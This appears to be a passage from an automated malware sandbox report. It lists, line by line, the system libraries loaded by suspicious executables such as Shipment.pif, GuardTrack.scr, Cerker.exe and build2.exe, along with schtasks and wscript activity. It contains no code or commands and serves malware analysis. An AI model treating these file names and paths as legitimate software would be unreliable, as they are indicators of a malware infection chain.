Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: version.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: amsi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: userenv.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasman.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: secur32.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: schannel.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: mskeyprotect.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ntasn1.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ncrypt.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: ncryptsslp.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: coremessaging.dll
